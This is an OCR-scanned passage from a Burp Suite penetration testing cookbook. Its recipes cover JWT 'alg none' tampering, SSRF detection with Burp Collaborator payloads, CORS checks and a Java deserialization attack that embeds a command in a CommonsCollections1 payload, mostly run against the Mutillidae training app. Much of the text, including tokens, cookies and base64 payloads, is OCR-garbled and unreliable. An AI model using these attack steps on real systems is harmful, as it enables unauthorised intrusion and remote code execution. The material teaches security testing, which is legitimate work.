beginning this recipe: 


So O 


& È @ OF’) https://sunshine-solutions-llc-cev.onelogin.com/login2/ w J w Mo 


onelogin 


Username 


Continue 


Forgot Password 


3. Switch to the Burp Proxy | HTTP history tab. Find the POST request with 
the URL /access/auth. Right-click and click the Send to Repeater option. 
4. Your host value will be specific to the OneLogin account you set up: 


tot ny] sote | scam | puntu | pepene | Sec | te | cop | [cto] vrs | anrs | 0G] sonen Taes 
ect Py | eose nsu | On | 


Fiter. Hiding CSS, image and general binary content 


Params (Edted Status | Length | MME ype | Extension | Tee 


HTTP/1.1 200 OK 

Cache-Control: max-age#0, private, must-revalidate 
Content-Type; application/json; charset=ut{-8 
Date: Pri, 14 Sep 2018 10:38:10 GHT 

ETag: W/"Sel2399abeZebSb77¢$321¢0$b1e0763" 
X-Content-Type-Options; nosnitt 

X*Correlation=Id: 6420c£$a-033b-416a-890e~e29000072bdd 
X-Frane-Options: SAMBORIGIN 


5. Switch to the Repeater tab and notice that you have two additional tabs 
relating to the two extensions you installed: 


SSS SSS SSS 
Cancel | | <|? | ir 


Request 


Raw [Params | Headers | Hex | ison Beauttier | JSON web Tokens | 


POST /access/auth HTTP/1.1 

Host: sunshine-solutions-lle-dev. onelogin. com 

User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 
Firefox/6é1.0 

Accept: application/json 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: 

https: //sunshine-solutions-llce-dev. onelogin. com/login?/?returnzeyJhbGciliJIUzI1NilIsI 
nRScCIEIkpXVCIS. eyJhdWQi0iJBQONFULMiLCJpe3MiOiINTOSPURFITCIsInVyaS1éImhOdHBz0i8ve3V 
ucchpbalt ¢2SsdXRpb2S2LWxsYylkZ2XYub251bGSnaW4uY2 St LoxvZ2luliwibWV0aCSk1450iZ2V0liwiZX 
hwIjoxNTM2OTESNDQwLCJwYXJhbxXMi Ont 9 £Q. VGhFWh3yj g2TCkpqeYhE8SXSVGOCGIVZOYp4MfVInzg 
content-type: application/json 

origin: https: //sunshine-solutions-lle-dev. onelogin.com 

Content-Length: 280 

Cookie: 

sub_session_onelogin. com=BAh7ByI fYnJvd3Nlel92ZXJpZmljYXRph25fdG9rZW4iRTI4ZDYwWYjJY2NmE 
WZ) FIND 1LmOWN1LYWUzOWYxMj Y5ZDkyZWU0YzhmMWESNGNhZT PmNzU30D Jk ODEANZQ3MzMxNDIGD3N1c3Npb2 
$ faWQikKWISMTASOGISLTIhZjAtNDc3NyLhMTALLTI4YjEOYz2Fi0TdkZg% 3D% 3D--$ fhéS4ch fd7Sce09Sch 
E3cE7fH198al7f98eeESd;  tdli=d83aelle-Sec f-486 f-adS f-83918dEd4794; 
—tdli_fp=67c75c18ff4d40d53512aa99dca3hbfc4; 

onelogin. com user=6h5701056h56eeeefa80c22féac8ã8e4Ildd58d8he; 
subdomain=sunshine-solutions-lle-dev; _ga=GAl.2.351109700.1536919271; 
_Jid=GÀl.2.1676526488.1536919271; 

mp _46875501d246bh692ebé fc40122817¢7l_mixpanel=$7B$22distinct_id$22$3A$20$22134384$22 
$2C422company$2243A420$22Sunshine$t20SolutionstICt2OLLC422$2C422otp_required$t2243A$2 
0$22false$22$42C$22424initial_referrer$22$3A$20$21https$3A$2F$I2Fsunshine-solutions-l 
le-dev. onelogin. com$2Flogin2$12F$3Freturnt3DeyJhbGciðiJIUzILNiIsInRScCIEIkpXVCJS.eyJ 
hdWQi0iJBQONFULMiLCJpe3Mi0i INTOSPUkFITCIsInVyaS16é ImhOdHBz0i8ve3VucZhphmUt clSsdXRpb2 
S2LWxsYylkZXYub2$1lbGSnaW4uYlStLyIsImlldGhvZCléImdldCIsImV4cCléMTUzZNjkxOTlzNywicGFyY 
WlzIjp7fX0. fUsQHOmS4p8NagsaVtGEHtVHiK TnndOCgfoGpOJXwU$22$2C$22$24initial_referring 
_domains 22% 3A%$20%22sunshine-solutions~1lle-dev. onelogin. com$ 2247D 

Connection: close 


{"return": “eyJhbGci0iJIUzIINilsInRScCléIkpXVCIS. eyThdaWQi0iJBQONFULMiLCIpe3MiOiJNTOSP 
UrFITCIsInVya$16ImhOdHB20i Sve3VucZhpbhat c29sdXPpb2S2LWxsYylkZXYub2$ 1bGSnaW4uy2se Lox 
v22luliwibWV0aG9k140iZ2VOliwiZXhw1 joxNTM2OTESNDQwLCJwYXJhbxMi Ont $ £0. VChFWh3yj g2TCkp 
qeYhESSXSVGOCG2VZ0Yp4M£VInzg" } 


6. Click the JSON Beautifier tab to view the JSON structure in a more 
readable manner: 


mii " Cance <ir > 7 


Request 


ie [eam [ses [ex [soa] 01 ve a 


{ 

"return": 
"eyJhbGciĝiJIUzIlNiIsInRScCIGIkpXVCJS. eyJhdWQi0iJBQONFULMiLCIpeSMiGiJNTOSPUFITCIsIn 
VyaS16ImhOdHB20i8ve3Vucfhpbult c29$sdkRpb2S2LWxsYylkZXYub25lbGSnaW4uY2StLoxvZ2luliwib 
WOaGSkIjoiZ2VOLliwiZXhw1joxNTMZOTESNDQwLCIwYXJhbxXMiOnt 9 £0. VGhFWh3yjg2TCkpqeYhESSxXsv 
GOCGIVZ0Yp4NfVInzg" 
} 


7. Click the JSON Web Tokens tab to reveal a debugger very similar to the 
one available at https://jwt.io. This plugin allows you to read the claims 
content and manipulate the encryption algorithm for various brute-force 
tests. For example, in the following screenshot, notice how you can change 
the algorithm to nOnE in order to attempt to create a new JWT token to 
place into the request: 


meaty 


JSON Beautifier 


Q Do not automatically modify signature 


: "R5256", \ Recalculate Signature 
$ "JWT", (I Keep original signature 
: { 
: "RSA", (D Sign with random key pair 
: "jut4blportswif | Secret/Key for Signature recalculation: 


i. "ee, 
: "ROB", 
: "ALIQIF9UZsHvA1C 


{ 
naud” : "ACCESS", 
"iss" : "MONORAIL", 
"uri" : "https://sunshing | Alg None Attack: 


"method" : "get", : 
jaa | Alg; nOnE y 
exp" : 1536919440, — 


"params" : { } [V] CVE-2018-0114 Attack 
[exp] Expired check failed - Fri Sep 14 10:04:00 UTC 2018 


Copy used pub&priv key to clipboard used in CVE attack 


4 


Signature = "Yez27CrhOiLCch 


How it works... 


Two extensions, JSON Beautifier and JSON Web Tokens, help testers to work 
with JWT tokens in an easier way by providing debugger tools conveniently 
available with the Burp UI. 


Using Burp Collaborator to 
determine SSRF 


SSRF is a vulnerability that allows an attacker to force applications to make 
unauthorized requests on the attacker's behalf. These requests can be as simple 
as DNS queries or as maniacal as commands from an attacker-controlled server. 


In this recipe, we will use Burp Collaborator to check open ports available for 
SSRF requests, and then use Intruder to determine whether the application will 
perform DNS queries to the public Burp Collaborator server through an SSRF 
vulnerability. 


Getting ready 


Using the OWASP Mutillidae II DNS lookup page, let's determine whether the 
application has an SSRF vulnerability. 


How to do it... 


1. Switch to the Burp Project options | Misc tab. Note the Burp Collaborator 
Server section. You have options available for using a private Burp 
Collaborator server, which you would set up, or you may use the publicly 
internet-accessible one made available by PortSwigger. For this recipe, we 
will use the public one: 


(2) Scheduled Tasks 


o These settings let you specify tasks that Burp will perform automatically at defined times or intervals. 


Time Repeat Task 


(2) Burp Collaborator Server 


ü Burp Collaborator is an external service that Burp can use to help discover many kinds of vulnerabilities. You can use the 
option is most appropriate for you. 


@ Use the default Collaborator server 
O Dont use Burp Collaborator 
O Use a private Collaborator server: 


Server location: 


ey 


Polling location (optional): | 
|) Poll over unencrypted HTTP 


Í Run health check... 


2. Check the box labeled Poll over unencrypted HTTP and click the Run 


health check... button: 


[2] Burp Collaborator Server 


(e) Burp Collaborator is an external service 
option is most appropriate for you. 


@ Use the default Collaborator server 
© Don't use Burp Collaborator 


© Use a private Collaborator server: 


Server location: 


— 


Polling location (optional): 


) Poll over unencrypted HTTP 


| Run health check ... | 


3. A pop-up box appears to test various protocols to see whether they will 
connect to the public Burp Collaborator server available on the internet. 


4. Check the messages for each protocol to see which are successful. Click the 
Close button when you are done: 


Burp Collaborator Health Check = O X 


Burp Collaborator Health Check 


Initiating health check 

Server address resolution 

Server HTTP connection 

Server HTTPS connection (trust enforced) 
Server HTTPS connection (trust not enforced) 
Server SMTP connection on port 25 

Server SMTP connection on port 587 

Server SMTPS connection (trust enforced) 
Server SMTPS connection (trust not enforced) 
Polling server address resolution 

Polling server connection 

Verify DNS interaction 

Verify HTTP interaction 

Verify HTTPS interaction 

Verify SMTP interaction 

Verify SMTPS interaction 

Server version 


5. From the top-level menu, select Burp | Burp Collaborator client: 


sities Intruder Repeater Window Help 


Search 


Save copy of project 
Import project [disk projects only] 
Rename project 


Project options 
User options 
Passwords 


Burp Infiltrator 

Burp Clickbandit 

Burp Collaborator client 
Save legacy state file 
Restore legacy state file 
Exit 


6. A pop-up box appears. In the section labeled Generate Collaborator 
payloads, change the 1 to 10: 


(2 Click "Copy to clipboard” to generate Burp Colaborator payloads that you can use in your own testing. Any interactions that result from using the payloads wil appear below 


Generate Collaborator payloads 


Copy to clipboard || E) include Collaborator server location 


1 


Number to generate; |1 


Poll Collaborator interactions 


Pollevery 60 seconds | Pollnow 


(Type | Payoad | Comment 


— 


7. Click the Copy to clipboard button. Leave all other defaults as they are. Do 
not close the Collaborator client window. If you close the window, you will 
lose the client session: 


| Burp Collaborator client 
[2] Click "Copy to clipboard” to generate Burp Collaborator payloads that you can use in your own testing. 
Generate Collaborator payloads 
Number to generate: | 10 Copy to clipboard Œ) Include Collaborator server location 


Poll Collaborator interactions 


Poll every 60 seconds | Poll now | 


8. Return to the Firefox browser and navigate to OWASP 2013 | A1 — 
Injection (Other) | HTML Injection (HTMLi) | DNS Lookup: 


@« OWASP Mutillidae Il: Web Pwn in Mass Production 


Version: 2.6.24 Security Level: 0(Hosed) Hints: Enabled (1 - 5cript K1dd1e) 
Home Login/Register Toggle Hints Show Popup Hints 


Not Logged In 
Toggle Security Enforce SSL Reset DB View Log View Captured 
OWASP 2013 A1 - Injection (SQL) 


- j j r > 4 n r > 
OWASP 2010 A1 - Injection (Other) HTML Injection (HTMLi) Add to your blog 


A2 - Broken Authentication and > HTMLI via HTTP Headers 


> Browser Info 
Session Management 


OWASP 2007 


HTMLI Via DOM Injection > DNS Lookup 


9. On the DNS Lookup page, type an IP address and click the Lookup DNS 
button: 


DNS Lookup 


Back 2 Help Me! 


Hints 


E> 
AJAX Switch to SOAP Web Service Version of this Page 


Who would you like to do a DNS lookup on? 


Enter IP or hostname 
Hostname/IP (192.168.56.101 
Lookup DNS 


10. Switch to the Burp Proxy | HTTP history tab and find the request you just 


created on the DNS Lookup page. Right-click and select the Send to 
Intruder option: 


Burp Intruder Repeater Window Help 


ec 


+ hy to UL Paad Sts Ley Eye ter Te 


HOST /nutilLidae/inderphp'pagesdns-Lookup.php ATTP/1.1 
Host: 192. 168.46.101 
User-Agent: Mozilla/5.0 (Windows WT 10.0; Winéd; x64; rv:61.0 


| Gecko/20L00L01 Firefox/él.0 


Send to Spder 
Do an actve scan 
Üo a passive scan 
and {0 IiruGer 
aa ie | Sand to Repeater 
Le: shovhinesels PHPSBSSID acopendivids Sando Sequencer 


Connection: close 
Upgrade=Insecure=hequests; | Sendo Compare 
Sand io Decoder 


11. Switch to the Burp Intruder | Positions tab. Clear all suggested payload 
markers and highlight the IP address, click the Add § button to place 
payload markers around the IP address value of the target_host parameter: 


{ Target l = Spider Scanner | intruder ] ™ Repeater | Sequencer | Decoder [ comparer | Extender | Project options | User options | Alerts JSON Beautifer JSON Web’ 
(iaa 

[raret Jiostons | Pavosas | orton | 

(2) Payload Positions 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned to payload positions - see help for full 


Attack type: | Sniper n1 į 


POST /mutillidae/index.php?page=dns-lookup.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/S.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html, application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http://192.168.5€.101/mutillidae/index.php?page=dns-lookup.php 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 66 

Cookie: showhints=1; PHPSESSID=deudlotk7fvqlihtlpe44Sirol; acopendivids=swingset,jotto,phpbbl,redmine; acgroupswithpersist=nada 
Connection: close 

Upgrade-Insecure-Requests: 1 


target_hostF§192. 168.56. 101§}dns-lookup-php-submit-button=Lookup+DNS 


12. Switch to the Burp Intruder | Payloads tab and paste the 10 payloads you 
copied to the clipboard from the Burp Collaborator client into the Payload 
Options [Simple list] textbox using the Paste button: 


[2] Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that are used as payloads. 


cowvhSal2yvy9wnzg4beorceskuel3. burpcollab... 
lin42iwon? gf uS8ebdwsrpcizc530rp.burpcollabor... 
j82mgf?7?505e3s6vbgqbn wijap1 lpa.burpcollabora... 
vihejscj4hxhbfpisnd23ztygmmdj18.burpcollaborat... 
w9Seas3jvhoh2fgiin42zzkv? mddb10.burpcollabor... 


Oijjxco4mxmbkpnssd734t0grmiba. burpcollaborato... 
Birrjocw4uxubspys0dféct8gzmgmeb.burpcollabor-... 
881b9p2quenel cffik3zywjs5jcady2. burpcollabor... 

yhjhivbm3kwkaiolrqc5?2syfplgn4c.burpcollaborat... 


Enter a new item 


© REE 


Add from list ... 


Make sure you uncheck the Payload Encoding checkbox. 


13. Click the Start attack button. The attack results table will pop up as your 
payloads are processing. Allow the attacks to complete. Note the 
burpcollaborator.net URL is placed in the payload marker position of 
the target_host parameter: 
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14. Return to the Burp Collaborator client and click the Poll now button to see 
whether any SSRF attacks were successful over any of the protocols. If any 
requests leaked outside of the network, those requests will appear in this 


| 


table along with the specific protocol used. If any requests are shown in this 
table, you will need to report the SSRF vulnerability as a finding. As you 
can see from the results shown here, numerous DNS queries were made by 
the application on behalf of the attacker-provided payloads: 


BW Burp Collaborator client = oO x 


(2) Click "Copy to clipboard” to generate Burp Collaborator payloads that you can use in your own testing. Any interactions that result from using the payloads will appear below. 


Generate Collaborator payloads 


Number to generate: | 10 | Copy to clipboard Œ Include Collaborator server location 


Poll Collaborator interactions 


a 


Foll every |60 seconds | Pollnow 
# «| Time Type Payload Comment 
a 
2 2018-Sep-15 11:56:35 UTC DNS jēduo14xlu7mir191di16gtjkpfd4 
3 2018-Sep-15 11:56:36 UTC DNS wwworzefaw7izt4cmeqteht4 ww2rqg 
4 2018-Sep-15 11:56:36 UTC DNS Tinzgaxat7qti4nnSn94xsctfel4ot 
S 2018-Sep-15 11:56:34 UTC DNS raSjlusaoriddoi7074osc7zaqgg45 
6 2018-Sep-15 11:56:34 UTC DNS 69dyk9rpnéksc3hmzm33rrée95fx3m 
7 2018-Sep-15 11:56:36 UTC DNS 1qst148k41 IntyyhghkyémnSq0wxkm 
LQ M4 Sen 15 11-56-36 UTF DNS a0kMedrtnakweThoza37ruRiOOtRay Li 
The Collaborator server received a DNS lookup of type A for the domain name zvyr62di9z6lyw3flfpwdks/vy1ppe.burpcollaborator.net. 


How it works... 


Network leaks and overly-generous application parameters can allow an attacker 
to have an application make unauthorized calls via various protocols on the 
attacker's behalf. In the case of this recipe, the application allows DNS queries to 
leak outside of the local machine and connect to the internet. 


See also 


For more information on SSRF attacks, see this PortSwigger blog entry 


at https://portswigger.net/blog/cracking-the-lens-targeting-https-hidden-attack- 


surface. 


Testing CORS 


An application that implements HTML5 CORS means the application will share 
browser information with another domain that resides at a different origin. By 
design, browser protections prevent external scripts from accessing information 
in the browser. This protection is known as Same-Origin Policy (SOP). 
However, CORS is a means of bypassing SOP, permissively. If an application 
wants to share browser information with a completely different domain, it may 
do so with properly-configured CORS headers. 


Web-penetration testers must ensure applications that handle AJAX calls (for 
example, HTMLS) do not have misconfigured CORS headers. Let's see how 
Burp can help us identify such misconfigurations. 


Getting ready 


Using the OWASP Mutillidae II AJAX version of the Pen Test Tool Lookup 
page, determine whether the application contains misconfigured CORS headers. 


How to do it... 


1. Navigate to HTMLS | Asynchronous JavaScript and XML | Pen Test Tool 
Lookup (AJAX): 


®©% OWASP Mutillidae Il: Web Pwn in Mass Product 


Version: 2.6.24 Security Level: 0 (Hosed) 


Hints: Enabled (1 - 5cript Kidd1e) Not Logged 
Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL ResetDB ViewLog View 


| Pen Test Tool Lookup (AJAX Version) 


HTML 5 Web Storage 


Others JavaScript Object Notation (JSON) 


Asyncronous JavaScript and XML P| Pen Test Tool Lookup (AJAX) 
Documentation (AJAX) 


2. Select a tool from the listing and click the Lookup Tool button: 


Pen Test Tool Lookup (AJAX Version) 


S Back Q Help Me! 
l Switch to POST Version of page 


Pen Test Tools 


Select Pen Test Tool 


Pen Test Tool | XSS Me v 


Lookup Tool 


3. Switch to the Burp Proxy | HTTP history tab and find the request you just 
made from the AJAX Version Pen Test Tool Lookup page. Flip to the 
Response tab: 


tr ot | scame | re |e | Sem | | ope || Propet ostana | vr | rs [ tn et | 008 Tates | Se 


[Far Stow a tes 


€ 


# | Host Metod | URL Upan A) Edted | Stas | Length MME ype | Extension | Tle Comment ss |P | Cooies 


evs | ee 
fom] een | wx [on ete 
HITP/A,1 200 OK Neen 


Date: Pri, 14 Sep 5010 16:54:36 CHT 

Server: Apache/2,2.14 (Ubuntu) sod mono/?.4.3 PHP/S.3,2-Lubuneud, 30 with Suhosin-Patch proxy btal/3.0.1 mod python/3,3.) Python/3.6.5 mod se1/2.2.14 OpenSSL/0.9,6k Phusion Passenger/4,0, 30 
Bod perl/2.0.4 Perl/v5.10.1 

X-Powered-By: DHD/S.3,2-lubuntud, 30 

Expires: Mon, 26 Jul 1997 06:00:00 GMT 

Cache-Control: no-cache, must-revalidate 

Praga: no-cache 

Content-Length: 295 

Connection: close 

Content-Type: application/json 


("query*: ("toollDRequested’; 12", "penTestTools’: |(*tool_id’: "12", "tool name’: *XSS Me", “phase to_use*: "Discovery", "tool type’: 'Pusser", comment": Firefox add-on. Attempts common strings vhich 
elicit responses from databases when SQL injection is present. Mot compatible with Firefox 0.0,°})}) 


4. Let's examine the headers more closely by selecting the Headers tab of the 
same Response tab. Though this is an AJAX request, the call is local to the 
application instead of being made to a cross-origin domain. Thus, no CORS 
headers are present since it is not required. However, if a call to an external 
domain were made (for example, Google APIs), then CORS headers would 
be required: 


e 
5—0 


| Value 
HTTP/1.1 200 OK 
Date Fri, 14 Sep 2018 16:54:36 GMT 
Server Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with 
X-Powered-By PHP/5.3.2-1ubuntu4.30 
Expires Mon, 26 Jul 1997 05:00:00 GMT 
Cache-Control no-cache, must-revalidate 
Pragma no-cache 
Content-Length 295 
Connection close 
Content-Type application/json 


5. 


In an AJAX request, there is a call out to an external URL (for example, a 
cross-domain). In order to permit the external domain to receive DOM 
information from the user's browser session, CORS headers must be 
present, including Access-Control-Allow-Origin: <name of cross 
domain>. 

In the event the CORS header does not specify the name of the external 
domain and, instead, uses a wild card (*), this is a vulnerability. Web 
pentesters should include this in their report as a misconfigured CORS 
headers vulnerability. 


How it works... 


Since the AJAX call used in this recipe originated from the same place, there is 
no need for CORS headers. However, in many cases, AJAX calls are made to 
external domains and require explicit permission through the HTTP response 
Access-Control-Allow-Origin header. 


See also 


For more information on misconfigured CORS headers, see this PortSwigger 


blog entry at https://portswigger.net/blog/exploiting-cors-misconfigurations-for- 


bitcoins-and-bounties. 


Performing Java deserialization 
attacks 


Serialization is a mechanism provided in various languages that allows the 
saving of an object's state in binary format. It is used for speed and obfuscation. 
The turning of an object back from binary into an object is deserialization. In 
cases where user input is used within an object and that object is later serialized, 
it creates an attack vector for arbitrary code-injection and possible remote code- 
execution. We will look at a Burp extension that will assist web-penetration 
testers in assessing applications for Java Deserialization vulnerabilities. 


Getting Ready 


Using OWASP Mutillidae II and a hand-crafted serialized code snippet, we will 
demonstrate how to use the Java Serial Killer Burp extension to assist in 
performing Java deserialization attacks. 


How to do it... 


1. Switch to Burp BApp Store and install the Java Serial Killer plugin: 


| Target Proxy | Spider | Scanner | Intruder | Repeater Sequencer | Decoder | Comparer | Extender | Project 


Extensions | BApp Store | APIs | Options 


BApp Store 


The BApp Store contains Burp extensions that have been written by users of Burp Suite, to extend Burp's capabilities. 


| Name | Installed 


| Java Serial Killer 


| Rating | Popularity | Last updated | Detail 


ma Tan 17 
30 Jan 2U01/ 


In order to create a scenario using a serialized object, we will take a 
standard request and add a serialized object to it for the purposes of 
demonstrating how you can use the extension to add attacker-controlled 
commands to serialized objects. 


2. Note the new tab added to your Burp UI menu at the top dedicated to the 
newly-installed plugin. 
3. Navigate to the Mutillidae homepage. 


4. Switch to the Burp Proxy| HTTP history tab and look for the request you 
just created by browsing to the Mutillidae homepage: 


WebSockets history | Options 


Filter: Hiding CSS, image and general binary content 


# alist | Method | URL ‘| Params | Edted | Status | Length | MIMEtype | Extension | 


[410 httpuvte2.t6s.s6101 =» [GET mute? ww SS OTM 
[a iS m m " 
| Request | Response | —————————— 


GET /mutillidae/ HTTP/1.1 
Host: 192.168.56.101 3 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/zo| Send to Spider 

Accept: text/html,application/xhtmltxml, application/xml;q=0.9,*/*;q=0.8] Doan active scan 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/ Send to Intruder Ctri+! 


Connection: close Send to Repeater Ctr+R 
Upgrade-Insecure-Requests: 1 Send to Sequencer 

Send to Comparer 

Send to Decoder 

Show response in browser 

Request in browser b 
Add Issue 

Send selected text to JSON Web Tokens Tab to decode 


Do a passive scan 


Unfortunately, there aren't any serialized objects in Mutillidae so we will 
have to create one ourselves. 


5. Switch to the Decoder tab and copy the following snippet of a serialized 
object: 


AC ED 00 05 73 72 00 OA 53 65 72 69 61 6C 54 65 


6. Paste the hexadecimal numbers into the Decoder tab, click the Encode as... 
button, and select base 64: 


Target | Proxy | Spider | Scanner | intruder | Repeater | Sequencer Comparer | Extender | Project options | User options | Alerts | JSON Beautifier | JSON Web Tokens | Java Serial Kiler 


AAC ED 00 08 73 7200 04 $3.65 7269461 6C 5465 @ Tet O Hex (2) 


QUM gRUOgUDAgMOUGNzUgNzigDAgMEE gNTMGNIGNZIGNAGNE gNIMGNTOgNIU= @ Text © Hex 


7. Copy the base-64 encoded value from the Decoder tab and paste it into the 
bottom of the request you sent to the Java Serial Killer tab. Use Ctrl + C to 


copy out of Decoder and Ctrl + V to paste it anywhere in the white space 
area of the request: 


| Seite “jane el p 


Command: 


MA 


GET /wutallidae/ HITP/1.1 
Host: 19°. 168.56. 101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Wined; x64; rv:6l.0) Gecko/20L00L01 
Firefox/él.l 

Accent: text/htwl, application/rhtwltiml application/rml ;g0.$,*/*;920.6 
Accept-Language: en-US en;qr0.$ 

Accept-Encoding: gzip, deflate 

Referer: http://192. 168.46. 101/ 

Commectlon: close 


Upgrade- Insecure- Requests: l 


8. Within the Java Serial Killer tab, pick a Java library from the drop-down 
list. For this recipe, we will use CommonsCollections1. Check the Base64 
Encode box. Add a command to embed into the serialized object. In this 
example, we will use the nslookup 127.0.0.1 command. Highlight the 
payload and click the Serialize button: 


ow [exes |e | 


GET /mutillidae/ HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 
Firefox/6él.0 

Accept: text/htul,application/xhtultxml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/ 

Connection: close 

Upgrade-Insecure-Requests: 1 


9. After clicking the Serialize button, notice the payload has changed and now 
contains your arbitrary command and is base-64 encoded: 


| Go | | Serialize | [V] Baseé4 Encode | CommonsColections' p | ? 
Command: nslookup 127.0.0.1 


GET /mutillidae/ HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Wine4; x64; rv:61.0) Gecko/20100101 
Firefox/6l.0 

Accept: text/htul,application/xhtultxmul,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-U5,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/ 

Connection: close 

Upgrade-Insecure-Requests: 1 

Content-Length: 1880 


rOOABMNyADJ2di4ucmVubGVj dC ShbmSvdGFOaWSublk FubuS0YXPph2SJbnZvY2FOaWSusGFuzGxlelLXKSqev 
Y36LAGACTAAMDWVt YuVyVuF s diV2dAAPTGphdmEvdXRphCSNYXATTAARCH1WZXQAEUxqYMZhL2xhbmcev)2xh 
c3MTeHBs fQAAAARADWphdmEudkPphCSNYxB4egAMamF2YSSsYWSnLnJl2émxlY3 QulukJveHnhJ SoqzBeDywlk 
AUWAAWHOACVMamF 2YS9sYWSnL3J1l2mxlLY3QvSWS2hblNhdGlvbkhhbmksZX17eHbacQBtaAaBecgaégh3JnLuFw 
YWNoZSSjb2lth2SzLulvbGxlY3Ppb2S2LmlheCSNyxpSTWFwhullgp SSEIQDAAFMAAdMYWNOh3JSdAAsTGSy 
2ySheGFyaGUvY2othWSucyS boxszwalSucy$UemFuclZvemllejt4cHlyADpyvemculxBhYlhlLwlivbWly 
bnlluY2Ssb6VjdGlvbniuznVuY3byvenMudfhhaWS LZFRyYWS22uSybWVyMMexX7 Ché lw CAAFbAALpVHJhbnilm 
h3JtZzXJcdkAtWOxvemevYXBhY2Zh1LINvbWlvbnlivY2$shb6Vjd¢lvbnivVHJhbnlmb 3 Jt 2X1 7eHB le gat WOxv 
cucu ERY hl LulivbhWlvbniuY2$shevjd¢lvbnituVHJhbnllmb 3Jt ZXI WvVYqddgOGIkCAAB4cAAAAAVacgA7 
h3dnLuFwYWNoZ255jb2lth252LulvbGxlY3Rph2S2cLmZlhwNOb3JzLkNvbn0YWSOVAJhbnlmb 3 Jt ZXIYdpAr 
QORxlATAAUWACWIDb2S2dGFudHQAEkxqYXZhb2xhbucvT2J qZWN003hwdnIAEWphdmEubGFuzySsdw50aWw11 
AAARARARARARAAB ACH yADpvemculrsBhY lhl LulvhWlLvbnluY2$shovjdGlvbniuznVul3kventusiS2b2t1 
clRyYWSe2m$ybWVyht3/aste2] gCAANDAAVp OXInc3QARLtMamF YS 9sYWSnlOSiaml 4 dDtMAatpTiWV0acsk 
Tuft 2XQARFxqYXZhLoxhbucvUs Ryall Sn0lsaclloyxvhbVRScGVedAaASwOxqYXZhbloxhbmcvg2xhe3M7 eel 
egATWOxqYXzhLuxhbucul2 J qZWNO0SDOWI8QeylsAgAAeHAAAAACAAKESVOUnVudGlt 2XVyABJhTGphdmku 
hGFuzy5DbGFzcsurFteuys lan] TAAHnWAAAAAHOACWOLIE Ll dGhvZHVxAH4AHgAAAAT Ce gAQamFCYSSsTi5n 
LINOcmluzéDwpDhéO7NCAgAAeHBlcQB+ABSacQB+ABZIcQB+ABSAAAAC cHVxAH4AGWAAAABOAAZpbnZvalV1 
cOB+AB4AAAACMMIARGphdmEubGFudySPYmplYSQAAAAARAARAARAAMHWwdnEATgAbcSRALgGAWdXIAR]ltMamF2 
YSSsYWSnL1N0cmluzzutOlbnéhl 7 RwIAAHhwAAAAAMQARmSzhGSvasVwIDEyNy4wLj Aux QaBCV4 Zi lc get 
AB4AAAABCOBtACN 2c QB+ABFacgARamF7YS5sYWSnbk ludGWnZzX154qCk S4GHOATAAUABMZhbHVLeHIAEGph 
duEubGFuzyS50dWligxXkGrJUdCSTgiwl AAHhwAAAAAMMNyABF qY¥XZhLnV0 aWwusGF oak lhcAUH? sHD Fup PRAWwAC 
RgAKbGShZEZhY3ByekkACKRocmV2aGSsZHhwP OAAAAAAAABSCARAABAAAAAReHh ce gASamFlYSSsYWSnLk92 
ZXJyaWRLAAAAAARAAARAAARACHRAT GAG 


10. Click the Go button within the Java Serial Killer tab to execute the payload. 
Even though you may receive an error in the response, ideally, you would 
have a listener, such as tcpdump, listening for any DNS lookups on port 53. 
From the listener, you would see the DNS query to the IP address you 
specified in the nslookup command. 


How it works... 


In cases where application code receives user input directly into an object 
without performing sanitization on such input, an attacker has the opportunity to 
provide arbitrary commands. The input is then serialized and run on the 
operating system where the application resides, creating a possible attack vector 
for remote code execution. 


There's more... 


Since this recipe scenario is a bit contrived, you may not receive a response on 
your network listener for the nslookup command. Try the recipe again after 
downloading a vulnerable version of an application with known Java 
deserialization vulnerabilities (that is, Jenkins, JBoss). Reuse the same steps 
shown here, only change the target application. 


See also 


e For more information about real-world Java deserialization attacks, check 
out these links: 
o Symantec: 


https://www.symantec.com/security_response/attacksignatures/detail.js 
p2asid=30326 
o Foxglove Security: https://foxglovesecurity.com/2015/11/06/what-do- 
weblogic-websphere-jboss-jenkins-opennms-and-your-application- 
have-in-common-this-vulnerability/ 
e To read more about this Burp plugin, check 


out https://blog.netspi.com/java-deserialization-attacks-burp/ 
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